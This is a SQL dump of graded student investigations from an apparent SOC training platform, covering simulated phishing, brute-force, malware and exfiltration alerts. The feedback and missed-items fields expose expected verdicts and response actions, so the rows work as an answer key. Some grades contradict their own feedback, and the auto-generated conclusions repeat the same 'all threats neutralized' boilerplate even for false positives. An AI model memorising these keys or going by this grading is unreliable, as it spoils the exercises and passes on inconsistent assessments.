(404, 248, 268, 'graded', 78, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 4:31:41 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T13:32:23.474Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)\",\"missed_items\":[\"block_hash\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-05 17:39:52', '2026-03-13 13:32:23', 0, NULL),
(405, 225, 854, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.5\",\"ip-192.168.100.100\",\"domain-https://mark\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:34:00 AM\\nALERT: False Positive: Legitimate QR Code Scanning Detected\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.0.0.5\\n- [IP] 192.168.100.100\\n- [DOMAIN] https://marketing.retailcorp.com/qrcampaign\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T22:34:12.678Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 01:42:53', '2026-03-05 22:32:53', '2026-03-05 22:34:12', 0, NULL),
(406, 250, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 02:52:55', '2026-03-06 02:52:55', 0, NULL),
(407, 251, 268, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:52:29 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:22:50.598Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-06 04:45:23', '2026-03-10 05:22:50', 0, NULL),
(408, 254, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 07:04:42', '2026-03-06 07:04:42', 0, NULL),
(409, 254, 1377, 'investigating', NULL, NULL, NULL, NULL, '2026-03-06 10:33:42', '2026-03-06 07:27:42', '2026-03-06 07:27:42', 0, NULL),
(410, 256, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 08:30:57', '2026-03-06 08:30:57', 0, NULL),
(411, 225, 1442, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.70\",\"ip-203.0.113.100\"],\"selectedActions\":[\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 8:59:58 PM\\nALERT: Successful Data Exfiltration to External Server\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.70\\n- [IP] 203.0.113.100\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:00:02.162Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:09:02', '2026-03-06 09:59:02', '2026-03-06 10:00:02', 0, NULL),
(412, 225, 849, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"domain-http://offic\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:15:25 PM\\nALERT: Credential Harvesting Attempt via Phishing Email\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.50\\n- [DOMAIN] http://office365-login.com/login\\n- [EMAIL] no-reply@office365-login.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:15:27.854Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:23:27', '2026-03-06 10:14:27', '2026-03-06 10:15:27', 0, NULL),
(413, 225, 943, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.2.34\",\"ip-198.51.100.45\",\"domain-http://fakeo\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:20:02 PM\\nALERT: Suspicious Office365 Login Page Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.1.2.34\\n- [IP] 198.51.100.45\\n- [DOMAIN] http://fakeoffice365.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:20:33.051Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:27:31', '2026-03-06 10:17:31', '2026-03-06 10:20:33', 0, NULL),
(414, 225, 942, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-45.67.89.101\",\"ip-192.168.0.34\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:23:29 PM\\nALERT: Unauthorized Remote Access Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 45.67.89.101\\n- [IP] 192.168.0.34\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:23:45.524Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:27:05', '2026-03-06 10:22:05', '2026-03-06 10:23:45', 0, NULL),
(415, 225, 1379, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.55\",\"domain-http://malic\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:27:10 PM\\nALERT: Phishing Email with QR Code Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.55\\n- [DOMAIN] http://malicious-qrcode-site.com\\n- [EMAIL] alert@securitybank.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:27:43.990Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:29:23', '2026-03-06 10:24:23', '2026-03-06 10:27:43', 0, NULL),
(416, 225, 1390, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.12\",\"domain-http://suspi\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:28:42 PM\\nALERT: Phishing Email with Suspicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.12\\n- [DOMAIN] http://suspicious-url.com/login\\n- [EMAIL] fake@phishingsite.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:28:45.490Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-06 13:34:07', '2026-03-06 10:28:07', '2026-03-06 10:28:45', 0, NULL),
(417, 225, 733, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.50\",\"ip-10.0.0.8\",\"domain-http://secur\",\"domain-trusted-secu\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:30:45 PM\\nALERT: Business Email Compromise Attempt via Lookalike Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.50\\n- [IP] 10.0.0.8\\n- [DOMAIN] http://secure-trusted.com/transaction\\n- [DOMAIN] trusted-secure.com\\n- [EMAIL] partner@trusted-secure.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:30:56.197Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:34:19', '2026-03-06 10:29:19', '2026-03-06 10:30:56', 0, NULL),
(418, 258, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 15:20:34', '2026-03-06 15:20:34', 0, NULL),
(419, 258, 1394, 'investigating', NULL, NULL, NULL, NULL, '2026-03-06 18:30:25', '2026-03-06 15:22:25', '2026-03-06 15:22:25', 0, NULL),
(420, 259, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 21:12:51', '2026-03-06 21:12:51', 0, NULL),
(422, 247, 1434, 'investigating', NULL, NULL, NULL, NULL, '2026-03-07 04:35:08', '2026-03-07 01:25:08', '2026-03-07 01:25:08', 0, NULL),
(423, 142, 731, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-10.0.0.5\",\"domain-http://secur\",\"domain-company-secu\",\"artifact_1\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:11:58 PM\\nALERT: Spear Phishing Attempt with Malicious URL Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 10.0.0.5\\n- [DOMAIN] http://secure-company.com/login\\n- [DOMAIN] company-secure.com\\n- [EMAIL] ceo@company-secure.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:12:35.403Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"block_url\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-07 08:15:44', '2026-03-07 05:08:44', '2026-03-07 05:12:35', 0, NULL),
(424, 142, 1387, 'graded', 80, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.15\",\"artifact_2\"],\"selectedActions\":[\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:14:44 PM\\nALERT: Brute Force Attack from Foreign IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.15\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:14:55.748Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/3)\",\"missed_items\":[\"reset_credentials\",\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-07 08:20:30', '2026-03-07 05:13:30', '2026-03-07 05:14:55', 0, NULL),
(425, 142, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:17:41 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T05:17:51.648Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 05:16:28', '2026-03-07 05:17:51', 0, NULL),
(426, 232, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 6:26:47 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T12:57:07.401Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 08:20:36', '2026-03-07 12:57:07', 0, NULL),
(427, 261, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 08:27:47', '2026-03-07 08:27:47', 0, NULL),
(428, 232, 247, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.77\",\"ip-192.168.1.10\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:51:27 PM\\nALERT: Brute Force Attack Detected - Multiple Failed Logins\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.77\\n- [IP] 192.168.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T14:21:36.824Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 11:36:39', '2026-03-07 08:28:39', '2026-03-07 14:21:36', 0, NULL),
(429, 260, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 10:22:53', '2026-03-07 10:22:53', 0, NULL),
(430, 225, 1374, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"domain-http://phish\",\"domain-fakecompany.\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"close_alert\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:38:47 PM\\nALERT: Phishing Email Detected with Malicious URL\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.50\\n- [DOMAIN] http://phishing-portal.com/login\\n- [DOMAIN] fakecompany.com\\n- [EMAIL] spoofed-ceo@fakecompany.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:38:52.526Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:42:26', '2026-03-07 10:37:26', '2026-03-07 10:38:52', 0, NULL),
(431, 225, 1380, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.70\",\"domain-http://fake-\",\"domain-legitimateco\",\"artifact_1\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:42:12 PM\\nALERT: BEC Attempt Detected with Spoofed Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.70\\n- [DOMAIN] http://fake-invoice-page.com\\n- [DOMAIN] legitimatecompany.com\\n- [EMAIL] ceo@legitimatecompany.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:42:21.803Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:46:16', '2026-03-07 10:39:16', '2026-03-07 10:42:21', 0, NULL),
(432, 225, 1385, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.70\",\"ip-203.0.113.175\",\"domain-exfiltration\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 9:44:10 PM\\nALERT: Data Exfiltration Attempt via Suspicious Domain\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.70\\n- [IP] 203.0.113.175\\n- [DOMAIN] exfiltration-domain.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T10:44:21.639Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 13:51:51', '2026-03-07 10:42:51', '2026-03-07 10:44:21', 0, NULL),
(433, 225, 1375, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.5\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:41:24 PM\\nALERT: Failed Login Attempts from Internal IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 10.0.0.5\\n- [USERNAME] testuser\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:41:37.428Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:21:30', '2026-03-07 11:11:30', '2026-03-07 11:41:37', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
